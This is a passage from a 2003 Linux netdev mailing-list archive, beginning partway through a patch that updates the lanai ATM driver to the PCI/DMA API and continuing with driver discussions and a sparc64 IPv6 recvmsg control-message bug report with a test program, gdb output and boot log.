lanai_get_sized_buffer(lanai, &lvcc->rx.buf, qos->rxtp.max_sdu, AAL5_RX_MULTIPLIER, qos->rxtp.max_sdu + 32, "RX"); } /* Setup a TX buffer for a currently unbound AAL5 vci */ -static int lanai_setup_tx_vci(int number, struct lanai_vcc *lvcc, +static int lanai_setup_tx_vci(struct lanai_dev *lanai, struct lanai_vcc *lvcc, const struct atm_qos *qos) { int max_sdu, multiplier; @@ -1720,7 +1710,7 @@ max_sdu = qos->txtp.max_sdu; multiplier = AAL5_TX_MULTIPLIER; } - return lanai_get_sized_buffer(number, &lvcc->tx.buf, max_sdu, + return lanai_get_sized_buffer(lanai, &lvcc->tx.buf, max_sdu, multiplier, 80, "TX"); } @@ -1781,8 +1771,9 @@ */ static int __init service_buffer_allocate(struct lanai_dev *lanai) { - lanai_buf_allocate(&lanai->service, SERVICE_ENTRIES * 4, 0); - if (lanai->service.order < 0) + lanai_buf_allocate(&lanai->service, SERVICE_ENTRIES * 4, 8, + lanai->pci); + if (lanai->service.start == NULL) return -ENOMEM; DPRINTK("allocated service buffer at 0x%08lX, size %d(%d)\n", (unsigned long) lanai->service.start, @@ -1793,14 +1784,14 @@ /* ServiceStuff register contains size and address of buffer */ reg_write(lanai, SSTUFF_SET_SIZE(lanai_buf_size_cardorder(&lanai->service)) | - SSTUFF_SET_ADDR(lanai_buf_dmaaddr(&lanai->service)), + SSTUFF_SET_ADDR(lanai->service.dmaaddr), ServiceStuff_Reg); return 0; } static inline void service_buffer_deallocate(struct lanai_dev *lanai) { - lanai_buf_deallocate(&lanai->service); + lanai_buf_deallocate(&lanai->service, lanai->pci); } /* Bitfields in service list */ @@ -2098,11 +2089,28 @@ /* -------------------- PCI INITIALIZATION/SHUTDOWN: */ -static inline int __init lanai_pci_start(struct lanai_dev *lanai) +static int __init lanai_pci_start(struct lanai_dev *lanai) { struct pci_dev *pci = lanai->pci; int result; u16 w; + + if (pci_enable_device(pci) != 0) { + printk(KERN_ERR DEV_LABEL "(itf %d): can't enable " + "PCI device", lanai->number); + return -ENXIO; + } + pci_set_master(pci); + if (pci_set_dma_mask(pci, 0xFFFFFFFF) != 0) { + printk(KERN_WARNING DEV_LABEL + "(itf %d): No suitable DMA available.\n", lanai->number); + return -EBUSY; + } + if (pci_set_consistent_dma_mask(pci, 0xFFFFFFFF) != 0) { + printk(KERN_WARNING DEV_LABEL + "(itf %d): No suitable DMA available.\n", lanai->number); + return -EBUSY; + } /* Get the pci revision byte */ result = pci_read_config_byte(pci, PCI_REVISION_ID, &lanai->pci_revision); @@ -2113,7 +2121,8 @@ } result = pci_read_config_word(pci, PCI_SUBSYSTEM_ID, &w); if (result != PCIBIOS_SUCCESSFUL) { - printk(KERN_ERR DEV_LABEL "(itf %d): can't read PCI_SUBSYSTEM_ID: %d\n", lanai->number, result); + printk(KERN_ERR DEV_LABEL "(itf %d): can't read " + "PCI_SUBSYSTEM_ID: %d\n", lanai->number, result); return -EINVAL; } if ((result = check_board_id_and_rev("PCI", w, NULL)) != 0) @@ -2125,43 +2134,11 @@ "PCI_LATENCY_TIMER: %d\n", lanai->number, result); return -EINVAL; } - result = pci_read_config_word(pci, PCI_COMMAND, &w); - if (result != PCIBIOS_SUCCESSFUL) { - printk(KERN_ERR DEV_LABEL "(itf %d): can't read " - "PCI_COMMAND: %d\n", lanai->number, result); - return -EINVAL; - } - w |= (PCI_COMMAND_MEMORY | PCI_COMMAND_MASTER | PCI_COMMAND_SERR | - PCI_COMMAND_PARITY); - result = pci_write_config_word(pci, PCI_COMMAND, w); - if (result != PCIBIOS_SUCCESSFUL) { - printk(KERN_ERR DEV_LABEL "(itf %d): can't " - "write PCI_COMMAND: %d\n", lanai->number, result); - return -EINVAL; - } pcistatus_check(lanai, 1); pcistatus_check(lanai, 0); return 0; } -static void lanai_pci_stop(struct lanai_dev *lanai) -{ - struct pci_dev *pci = lanai->pci; - int result; - u16 pci_command; - result = pci_read_config_word(pci, PCI_COMMAND, &pci_command); - if (result != PCIBIOS_SUCCESSFUL) { - printk(KERN_ERR DEV_LABEL "(itf %d): can't " - "read PCI_COMMAND: %d\n", lanai->number, result); - return; - } - pci_command &= ~(PCI_COMMAND_MEMORY | PCI_COMMAND_MASTER); - result = pci_write_config_word(pci, PCI_COMMAND, pci_command); - if (result != PCIBIOS_SUCCESSFUL) - printk(KERN_ERR DEV_LABEL "(itf %d): can't " - "write PCI_COMMAND: %d\n", lanai->number, result); -} - /* -------------------- VPI/VCI ALLOCATION: */ /* @@ -2445,7 +2422,7 @@ #endif iounmap((void *) lanai->base); error_pci: - lanai_pci_stop(lanai); + pci_disable_device(lanai->pci); error: return result; } @@ -2470,7 +2447,7 @@ lanai->conf1 |= CONFIG1_POWERDOWN; conf1_write(lanai); #endif - lanai_pci_stop(lanai); + pci_disable_device(lanai->pci); vcc_table_deallocate(lanai); service_buffer_deallocate(lanai); iounmap((void *) lanai->base); @@ -2493,7 +2470,7 @@ if (--lanai->naal0 <= 0) aal0_buffer_free(lanai); } else - lanai_buf_deallocate(&lvcc->rx.buf); + lanai_buf_deallocate(&lvcc->rx.buf, lanai->pci); lvcc->rx.atmvcc = NULL; } if (lvcc->tx.atmvcc == atmvcc) { @@ -2503,7 +2480,7 @@ lanai->cbrvcc = NULL; } lanai_shutdown_tx_vci(lanai, lvcc); - lanai_buf_deallocate(&lvcc->tx.buf); + lanai_buf_deallocate(&lvcc->tx.buf, lanai->pci); lvcc->tx.atmvcc = NULL; } if (--lvcc->nref == 0) { @@ -2551,7 +2528,7 @@ result = aal0_buffer_allocate(lanai); } else result = lanai_setup_rx_vci_aal5( - lanai->number, lvcc, &atmvcc->qos); + lanai, lvcc, &atmvcc->qos); if (result != 0) goto out_free; lvcc->rx.atmvcc = atmvcc; @@ -2566,7 +2543,7 @@ if (atmvcc->qos.txtp.traffic_class != ATM_NONE) { APRINTK(lvcc->tx.atmvcc == NULL, "tx.atmvcc!=NULL, vci=%d\n", vci); - result = lanai_setup_tx_vci(lanai->number, lvcc, &atmvcc->qos); + result = lanai_setup_tx_vci(lanai, lvcc, &atmvcc->qos); if (result != 0) goto out_free; lvcc->tx.atmvcc = atmvcc; @@ -2849,49 +2826,69 @@ .proc_read = lanai_proc_read }; -/* detect one type of card LANAI2 or LANAIHB */ -static int __init lanai_detect_1(unsigned int vendor, unsigned int device) +/* initialize one probed card */ +static int __devinit lanai_init_one(struct pci_dev *pci, + const struct pci_device_id *ident) { - struct pci_dev *pci = NULL; struct lanai_dev *lanai; struct atm_dev *atmdev; - int count = 0, result; - while ((pci = pci_find_device(vendor, device, pci)) != NULL) { - lanai = (struct lanai_dev *) - kmalloc(sizeof *lanai, GFP_KERNEL); - if (lanai == NULL) { - printk(KERN_ERR DEV_LABEL ": couldn't allocate " - "dev_data structure!\n"); - break; - } - atmdev = atm_dev_register(DEV_LABEL, &ops, -1, 0); - if (atmdev == NULL) { - printk(KERN_ERR DEV_LABEL ": couldn't register " - "atm device!\n"); - kfree(lanai); - break; - } - atmdev->dev_data = lanai; - lanai->pci = pci; - lanai->type = (enum lanai_type) device; - if ((result = lanai_dev_open(atmdev)) != 0) { - DPRINTK("lanai_start() failed, err=%d\n", -result); - atm_dev_deregister(atmdev); - kfree(lanai); - continue; - } - count++; + int result; + + lanai = (struct lanai_dev *) kmalloc(sizeof(*lanai), GFP_KERNEL); + if (lanai == NULL) { + printk(KERN_ERR DEV_LABEL + ": couldn't allocate dev_data structure!\n"); + return -ENOMEM; + } + + atmdev = atm_dev_register(DEV_LABEL, &ops, -1, 0); + if (atmdev == NULL) { + printk(KERN_ERR DEV_LABEL + ": couldn't register atm device!\n"); + kfree(lanai); + return -EBUSY; + } + + atmdev->dev_data = lanai; + lanai->pci = pci; + lanai->type = (enum lanai_type) ident->device; + + result = lanai_dev_open(atmdev); + if (result != 0) { + DPRINTK("lanai_start() failed, err=%d\n", -result); + atm_dev_deregister(atmdev); + kfree(lanai); } - return count; + return result; } +static struct pci_device_id lanai_pci_tbl[] __devinitdata = { + { + PCI_VENDOR_ID_EF, PCI_VENDOR_ID_EF_ATM_LANAI2, + PCI_ANY_ID, PCI_ANY_ID, 0, 0, 0 + }, + { + PCI_VENDOR_ID_EF, PCI_VENDOR_ID_EF_ATM_LANAIHB, + PCI_ANY_ID, PCI_ANY_ID, 0, 0, 0 + }, + { 0, } /* terminal entry */ +}; +MODULE_DEVICE_TABLE(pci, lanai_pci_tbl); + +static struct pci_driver lanai_driver = { + .name = DEV_LABEL, + .id_table = lanai_pci_tbl, + .probe = lanai_init_one, +}; + static int __init lanai_module_init(void) { - if (lanai_detect_1(PCI_VENDOR_ID_EF, PCI_VENDOR_ID_EF_ATM_LANAI2) + - lanai_detect_1(PCI_VENDOR_ID_EF, PCI_VENDOR_ID_EF_ATM_LANAIHB)) - return 0; - printk(KERN_ERR DEV_LABEL ": no adaptor found\n"); - return -ENODEV; + int x; + + x = pci_module_init(&lanai_driver); + if (x != 0) + printk(KERN_ERR DEV_LABEL ": no adapter found\n"); + return x; } static void __exit lanai_module_exit(void) From davem@redhat.com Mon Jul 28 07:15:08 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 07:15:16 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6SEF7Fl019037 for ; Mon, 28 Jul 2003 07:15:07 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id HAA28582; Mon, 28 Jul 2003 07:11:57 -0700 Date: Mon, 28 Jul 2003 07:11:57 -0700 From: "David S. Miller" To: Pekka Pietikainen Cc: zagarna@yahoo.com, netdev@oss.sgi.com Subject: Re: b44 module problems Message-Id: <20030728071157.0ad6f726.davem@redhat.com> In-Reply-To: <20030728095631.GA6946@ee.oulu.fi> References: <20030728114302.1cbb6f70.zagarna@yahoo.com> <20030728095631.GA6946@ee.oulu.fi> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4339 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Mon, 28 Jul 2003 12:56:31 +0300 Pekka Pietikainen wrote: > You're not trying to use ipv6 or have the module loaded by any chance? When working > on the driver I had similar problems with rmmod on 2.5 when the ipv6 module > was loaded, without it unloading worked just fine (if I understood correctly, > this is a known problem with all ethernet drivers). Yes, and this is fixed in 2.6.0-test2 From davem@redhat.com Mon Jul 28 07:35:53 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 07:35:57 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6SEZrFl020990 for ; Mon, 28 Jul 2003 07:35:53 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id HAA28677; Mon, 28 Jul 2003 07:32:40 -0700 Date: Mon, 28 Jul 2003 07:32:40 -0700 From: "David S. Miller" To: Cedric Gavage Cc: alan@lxorguk.ukuu.org.uk, jgarzik@pobox.com, netdev@oss.sgi.com Subject: Re: [Fwd: kernel 2.4.21] Message-Id: <20030728073240.03ff1c2e.davem@redhat.com> In-Reply-To: <3F24D31F.5050904@unixtech.be> References: <1058634345.22000.2.camel@dhcp22.swansea.linux.org.uk> <20030719191723.0821227f.davem@redhat.com> <3F1E53F7.5000803@unixtech.be> <20030723023528.76b0f69c.davem@redhat.com> <3F1E58EE.5010109@unixtech.be> <20030723024648.2e4b6a62.davem@redhat.com> <3F1E7435.4060308@unixtech.be> <20030727163422.28e44736.davem@redhat.com> <3F24D31F.5050904@unixtech.be> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4340 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Mon, 28 Jul 2003 09:39:11 +0200 Cedric Gavage wrote: > David S. Miller wrote: > > On Wed, 23 Jul 2003 13:40:37 +0200 > > Cedric Gavage wrote: > > > >>Ok, now it's e100 driver, I will wait some hours to see if we have again > >>problems, thanks for your help. > > > > Any problems yet? > > It's ok now... I was waiting some hours (days) to see if it was really ok ;) > > Thanks for your help. No problem. Alan and Jeff, please note, executive summary: 1) 'eepro100' driver in 2.4.x + high end EFNET IRC server == crashes 2) same as #1 using 'e100' driver == works From davem@redhat.com Mon Jul 28 07:43:05 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 07:43:08 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6SEh4Fl021739 for ; Mon, 28 Jul 2003 07:43:05 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id HAA28725; Mon, 28 Jul 2003 07:39:41 -0700 Date: Mon, 28 Jul 2003 07:39:40 -0700 From: "David S. Miller" To: chas3@users.sourceforge.net Cc: chas@cmf.nrl.navy.mil, mitch@sfgoth.com, netdev@oss.sgi.com Subject: Re: [atmdrvr lanai] PATCH: update to modern DMA/PCI api, etc Message-Id: <20030728073940.419ffb98.davem@redhat.com> In-Reply-To: <200307281353.h6SDrHsG009681@ginger.cmf.nrl.navy.mil> References: <20030728045620.GJ32831@gaz.sfgoth.com> <200307281353.h6SDrHsG009681@ginger.cmf.nrl.navy.mil> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4341 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Mon, 28 Jul 2003 09:50:35 -0400 chas williams wrote: > dave, please apply the following patch from mitch: Done, thanks guys. From garzik@gtf.org Mon Jul 28 08:07:46 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 08:07:50 -0700 (PDT) Received: from havoc.gtf.org (host-64-213-145-173.atlantasolutions.com [64.213.145.173] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6SF7jFl023749 for ; Mon, 28 Jul 2003 08:07:46 -0700 Received: by havoc.gtf.org (Postfix, from userid 500) id 86CC76611; Mon, 28 Jul 2003 11:07:37 -0400 (EDT) Date: Mon, 28 Jul 2003 11:07:37 -0400 From: Jeff Garzik To: "David S. Miller" Cc: Cedric Gavage , alan@lxorguk.ukuu.org.uk, netdev@oss.sgi.com Subject: Re: [Fwd: kernel 2.4.21] Message-ID: <20030728150737.GB1399@gtf.org> References: <1058634345.22000.2.camel@dhcp22.swansea.linux.org.uk> <20030719191723.0821227f.davem@redhat.com> <3F1E53F7.5000803@unixtech.be> <20030723023528.76b0f69c.davem@redhat.com> <3F1E58EE.5010109@unixtech.be> <20030723024648.2e4b6a62.davem@redhat.com> <3F1E7435.4060308@unixtech.be> <20030727163422.28e44736.davem@redhat.com> <3F24D31F.5050904@unixtech.be> <20030728073240.03ff1c2e.davem@redhat.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030728073240.03ff1c2e.davem@redhat.com> User-Agent: Mutt/1.3.28i X-archive-position: 4342 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev On Mon, Jul 28, 2003 at 07:32:40AM -0700, David S. Miller wrote: > On Mon, 28 Jul 2003 09:39:11 +0200 > Cedric Gavage wrote: > > > David S. Miller wrote: > > > On Wed, 23 Jul 2003 13:40:37 +0200 > > > Cedric Gavage wrote: > > > > > >>Ok, now it's e100 driver, I will wait some hours to see if we have again > > >>problems, thanks for your help. > > > > > > Any problems yet? > > > > It's ok now... I was waiting some hours (days) to see if it was really ok ;) > > > > Thanks for your help. > > No problem. > > Alan and Jeff, please note, executive summary: > > 1) 'eepro100' driver in 2.4.x + high end EFNET IRC server == crashes > 2) same as #1 using 'e100' driver == works My Official Story(tm) is currently * use e100 * unless you really really want to use eepro100 eepro100 in the kernel tree is essentially unmaintained. One of the big reasons I merged e100 is that it has an active maintainer with full access to docs. Jeff From felix@allot.com Mon Jul 28 08:31:31 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 08:31:37 -0700 (PDT) Received: from mxout5.netvision.net.il (mxout5.netvision.net.il [194.90.9.29]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6SFVTFl027426 for ; Mon, 28 Jul 2003 08:31:31 -0700 Received: from exg.allot.com ([199.203.223.202]) by mxout5.netvision.net.il (iPlanet Messaging Server 5.2 HotFix 1.14 (built Mar 18 2003)) with ESMTP id <0HIQ007G9R2ZC0@mxout5.netvision.net.il> for netdev@oss.sgi.com; Mon, 28 Jul 2003 18:30:35 +0300 (IDT) Received: from allot.com (199.203.223.201 [199.203.223.201]) by exg.allot.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id PZL9SLWK; Mon, 28 Jul 2003 18:33:28 +0200 Date: Mon, 28 Jul 2003 18:30:49 +0300 From: Felix Radensky Subject: Re: [Fwd: kernel 2.4.21] To: Jeff Garzik Cc: "David S. Miller" , Cedric Gavage , alan@lxorguk.ukuu.org.uk, netdev@oss.sgi.com Message-id: <3F2541A9.8030407@allot.com> Organization: Allot Communications Ltd. MIME-version: 1.0 Content-type: text/plain; charset=us-ascii; format=flowed Content-transfer-encoding: 7BIT X-Accept-Language: en-us, en User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.2) Gecko/20030208 Netscape/7.02 References: <1058634345.22000.2.camel@dhcp22.swansea.linux.org.uk> <20030719191723.0821227f.davem@redhat.com> <3F1E53F7.5000803@unixtech.be> <20030723023528.76b0f69c.davem@redhat.com> <3F1E58EE.5010109@unixtech.be> <20030723024648.2e4b6a62.davem@redhat.com> <3F1E7435.4060308@unixtech.be> <20030727163422.28e44736.davem@redhat.com> <3F24D31F.5050904@unixtech.be> <20030728073240.03ff1c2e.davem@redhat.com> <20030728150737.GB1399@gtf.org> X-archive-position: 4343 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: felix@allot.com Precedence: bulk X-list: netdev Then maybe it makes sense to enable e100 by default and not eepro100 ? Felix. Jeff Garzik wrote: > > >My Official Story(tm) is currently > >* use e100 >* unless you really really want to use eepro100 > >eepro100 in the kernel tree is essentially unmaintained. One of the >big reasons I merged e100 is that it has an active maintainer with >full access to docs. > > Jeff > > > > > > From davem@redhat.com Mon Jul 28 08:32:59 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 08:33:04 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6SFWxFl027827 for ; Mon, 28 Jul 2003 08:32:59 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id IAA29142; Mon, 28 Jul 2003 08:29:15 -0700 Date: Mon, 28 Jul 2003 08:29:15 -0700 From: "David S. Miller" To: Jan Oravec Cc: kuznet@ms2.inr.ac.ru, netdev@oss.sgi.com Subject: Re: kernel bug: control message on AF_INET6 sockets strangely truncated on sparc64 platform Message-Id: <20030728082915.67d74b31.davem@redhat.com> In-Reply-To: <20030728151849.GA18408@wsx.ksp.sk> References: <20030728151849.GA18408@wsx.ksp.sk> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4344 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Mon, 28 Jul 2003 17:18:49 +0200 Jan Oravec wrote: > while trying to setup IPv6-capable bind DNS server on UltraSparc II box, > i have found the following problem: Yes, this is an unfortunate consequence of how we emulate socket CMSGs in 32-bit applications running on a 64-bit kernel in 2.4.x It is not easily fixable in 2.4.x, in fact it would be such an intrusive and bug-prone change that I'm probably not going to fix it in 2.4.x The workaround in the app is the use slightly larger than necessary CMSG buffers. Sorry :( 2.5.x/2.6.x does things properly and the bug shouldn't show up there. From wsx@6com.sk Mon Jul 28 08:49:33 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 08:49:50 -0700 (PDT) Received: from mail.6com.sk (cement.ksp.edi.fmph.uniba.sk [158.195.16.151] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6SFnMFl030034 for ; Mon, 28 Jul 2003 08:49:23 -0700 Received: by mail.6com.sk (Postfix, from userid 501) id 5145A16BB7; Mon, 28 Jul 2003 17:18:49 +0200 (CEST) Date: Mon, 28 Jul 2003 17:18:49 +0200 From: Jan Oravec To: davem@redhat.com, kuznet@ms2.inr.ac.ru, netdev@oss.sgi.com Subject: kernel bug: control message on AF_INET6 sockets strangely truncated on sparc64 platform Message-ID: <20030728151849.GA18408@wsx.ksp.sk> Reply-To: Jan Oravec Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.4.1i X-Operating-System: UNIX X-archive-position: 4345 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jan.oravec@6com.sk Precedence: bulk X-list: netdev Hello, while trying to setup IPv6-capable bind DNS server on UltraSparc II box, i have found the following problem: let's have the following program: #include #include #include #include #include int main() { int fd; struct sockaddr_in6 sin; char buf0[1000]; char buf1[1000]; char buf2[1000]; struct msghdr mhdr; struct iovec iov; int on=1; mhdr.msg_name=buf0; mhdr.msg_namelen=1000; mhdr.msg_iov=&iov; mhdr.msg_iovlen=1; mhdr.msg_control=buf1; mhdr.msg_controllen=CMSG_LEN(sizeof(struct in6_pktinfo)); mhdr.msg_flags=0; iov.iov_base=buf2; iov.iov_len=1000; printf("clen_init=%d\n", mhdr.msg_controllen); fd=socket(AF_INET6, SOCK_DGRAM, 0); setsockopt(fd, IPPROTO_IPV6, IPV6_PKTINFO, &on, sizeof(on)); sin.sin6_port=htons(4747); memset(&sin.sin6_addr, 0, 16); bind(fd, &sin, sizeof(struct sockaddr_in6)); recvmsg(fd, &mhdr, 0); printf("clen=%d flags=%d\n", mhdr.msg_controllen, mhdr.msg_flags); return 0; } after running and sending any IPv6 UDP packet to port 4747, we get the following result: clen_init=32 clen=28 flags=8 when we change controllen to 33, we get: clen_init=33 clen=32 flags=8 and finally to 36: clen_init=36 clen=32 flags=0 this case is not so critical, it just truncates something what it should not, but the following happened while debugging bind: 898 cc = recvmsg(sock->fd, &msghdr, 0); (gdb) print msghdr $37 = {msg_name = 0x15c2b4, msg_namelen = 28, msg_iov = 0xeffff658, msg_iovlen = 1, msg_control = 0xeffff600, msg_controllen = 52, msg_flags = 0} (gdb) next 899 recv_errno = errno; (gdb) print msghdr $38 = {msg_name = 0x0, msg_namelen = 28, msg_iov = 0xeffff658, msg_iovlen = 1, msg_control = 0xeffff600, msg_controllen = 60, msg_flags = 8} (gdb) x/13 msghdr->msg_control 0xeffff600: 0x00000014 0x0000ffff 0x0000001d 0x3f251d01 0xeffff610: 0x000bb770 0x00000010 0x00000029 0x00000002 0xeffff620: 0x3ffe80ee 0x00000018 0xeffff658 0x00000001 0xeffff630: 0xeffff600 msg_controllen was increased by kernel the source address of packet was 3ffe:80ee:3bd:0:a00:20ff:fec9:3aad, not 3ffe:80ee:0000:0018:efff:f658:0000:0001 when tried on x86 platform, it worked fine and once, when i compiled bind with -O0, kernel crashed i am using: Linux ns2 2.4.22-pre6 #2 Wed Jul 16 22:34:00 CEST 2003 sparc64 sun4u TI UltraSparc II (BlackBird) GNU/Linux (same results on stable 2.4.21) dmesg output: PROMLIB: Sun IEEE Boot Prom 3.23.1 1999/07/16 12:08 Linux version 2.4.22-pre6 (root@ns1) (gcc version egcs-2.92.11 19980921 (gcc2 ss-980609 experimental)) #2 Wed Jul 16 22:34:00 CEST 2003 ARCH: SUN4U Ethernet address: 08:00:20:c9:3a:ad On node 0 totalpages: 65080 zone(0): 65421 pages. zone(1): 0 pages. zone(2): 0 pages. Found CPU 0 (node=f006d624,mid=0) Found 1 CPU prom device tree node(s). Kernel command line: root=/dev/sda2 sym53c8xx=excl:0x7d9 Calibrating delay loop... 897.84 BogoMIPS Memory: 514456k available (1592k kernel code, 280k data, 128k init) [fffff80000000000,00000000bff1a000] Dentry cache hash table entries: 65536 (order: 7, 1048576 bytes) Inode cache hash table entries: 32768 (order: 6, 524288 bytes) Mount cache hash table entries: 512 (order: 0, 8192 bytes) Buffer cache hash table entries: 32768 (order: 5, 262144 bytes) Page-cache hash table entries: 65536 (order: 6, 524288 bytes) POSIX conformance testing by UNIFIX PCI: Probing for controllers. PCI: Found PSYCHO, control regs at 000001fe00000000 PSYCHO: Shared PCI config space at 000001fe01000000 PCI-IRQ: Routing bus[ 0] slot[ 1] map[0] to INO[21] PCI-IRQ: Routing bus[ 0] slot[ 3] map[0] to INO[20] PCI-IRQ: Routing bus[ 0] slot[ 3] map[0] to INO[26] PCI-IRQ: Routing bus[ 0] slot[ 4] map[0] to INO[18] PCI-IRQ: Routing bus[ 0] slot[ 4] map[0] to INO[19] PCI0(PBMB): Bus running at 33MHz PCI-IRQ: Routing bus[ 1] slot[ 1] map[0] to INO[00] PCI0(PBMA): Bus running at 33MHz ebus0: [auxio] [power] [SUNW,pll] [sc] [se] [su] [su] [ecpp] [fdthree] [eeprom] [flashprom] PCIO serial driver version 1.54 su(mouse) at 0x1fff13062f8 (irq = 4,7ea) is a 16550A Sun Mouse-Systems mouse driver version 1.00 su(kbd) at 0x1fff13083f8 (irq = 9,7e9) is a 16550A keyboard: not present power: Control reg at 000001fff1724000 ... not using powerd. Linux NET4.0 for Linux 2.4 Based upon Swansea University Computer Society NET3.039 Initializing RT netlink socket Starting kswapd Journalled Block Device driver loaded devfs: v1.12c (20020818) Richard Gooch (rgooch@atnf.csiro.au) devfs: boot_options: 0x1 Console: switching to frame buffer device fb0: Permedia2 PCI board (Permedia2), using 8192K of video memory. rtc_init: no PC rtc found Software Watchdog Timer: 0.05, timer margin: 60 sec NET4: Frame Diverter 0.46 sunhme.c:v2.01 26/Mar/2002 David S. Miller (davem@redhat.com) divert: allocating divert_blk for eth0 eth0: HAPPY MEAL (PCI/CheerIO) 10/100BaseT Ethernet 08:00:20:c9:3a:ad SCSI subsystem driver Revision: 1.00 sym.0.3.0: setting PCI_COMMAND_INVALIDATE. sym.0.3.1: setting PCI_COMMAND_PARITY... sym.0.3.1: setting PCI_COMMAND_INVALIDATE. sym.0.4.0: setting PCI_COMMAND_PARITY... sym.0.4.0: setting PCI_COMMAND_INVALIDATE. sym.0.4.1: setting PCI_COMMAND_PARITY... sym.0.4.1: setting PCI_COMMAND_INVALIDATE. sym0: <875> rev 0x14 on pci bus 0 device 3 function 0 irq 4,7e0 sym0: No NVRAM, ID 7, Fast-20, SE, parity checking sym0: SCSI BUS has been reset. sym1: <875> rev 0x14 on pci bus 0 device 3 function 1 irq 4,7e6 sym1: No NVRAM, ID 7, Fast-20, SE, parity checking sym1: SCSI BUS has been reset. sym2: <875> rev 0x14 on pci bus 0 device 4 function 0 irq 4,7d8 sym2: No NVRAM, ID 7, Fast-20, SE, parity checking sym2: SCSI BUS has been reset. sym3: <875> rev 0x14 on pci bus 0 device 4 function 1 irq 4,7d9 sym3: No NVRAM, ID 7, Fast-20, SE, parity checking sym3: SCSI BUS has been reset. scsi0 : sym-2.1.17a scsi1 : sym-2.1.17a scsi2 : sym-2.1.17a scsi3 : sym-2.1.17a Vendor: SEAGATE Model: ST318404LSUN18G Rev: 4207 Type: Direct-Access ANSI SCSI revision: 03 Vendor: TOSHIBA Model: XM6201TASUN32XCD Rev: 1103 Type: CD-ROM ANSI SCSI revision: 02 sym0:0:0: tagged command queuing enabled, command queue depth 16. Attached scsi disk sda at scsi0, channel 0, id 0, lun 0 sym0:0: FAST-20 WIDE SCSI 40.0 MB/s ST (50.0 ns, offset 16) SCSI device sda: 35378533 512-byte hdwr sectors (18114 MB) Partition check: /dev/scsi/host0/bus0/target0/lun0: p1 p2 p3 p4 p5 Initializing Cryptographic API NET4: Linux TCP/IP 1.0 for NET4.0 IP Protocols: ICMP, UDP, TCP, IGMP IP: routing cache hash table of 8192 buckets, 64Kbytes TCP: Hash tables configured (established 65536 bind 32768) Linux IP multicast router 0.06 plus PIM-SM NET4: Unix domain sockets 1.0/SMP for Linux NET4.0. kjournald starting. Commit interval 5 seconds EXT3-fs: mounted filesystem with ordered data mode. VFS: Mounted root (ext3 filesystem) readonly. Mounted devfs on 